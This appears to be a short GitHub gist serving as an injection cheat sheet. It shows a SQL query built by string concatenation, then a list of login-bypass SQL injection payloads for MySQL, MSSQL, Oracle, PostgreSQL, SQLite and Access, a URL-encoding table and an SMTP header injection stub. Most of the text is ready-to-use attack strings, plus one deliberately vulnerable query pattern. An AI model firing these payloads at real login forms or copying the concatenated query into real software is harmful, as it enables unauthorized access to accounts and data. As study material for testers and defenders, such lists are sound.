@ruevaughn
Last active August 21, 2021 04:51
query = "SELECT * FROM users WHERE name='" + user + "' AND password='" + password + "'";
SELECT * FROM users WHERE name='jane' AND password='x' OR '1'='1';
OWASP TOP 10 2013-2021 #1 Vulnerability: Injection
# SQLinjection
-- MySQL, MSSQL, Oracle, PostgreSQL, SQLite:
' OR '1'='1' --
' OR '1'='1' /*
' UNION SELECT 'admin' AS password# Password = admin
-- MySQL:
' OR '1'='1' #
-- Access (using null characters):
' OR '1'='1' %00
' OR '1'='1' %16
# URL Encoding
URL Encoding Character
%20 space
%22 "
%27 '
%28 (
%29 )
%2C ,
# SMTP Header Injection into name or other fields
Joe\[email protected]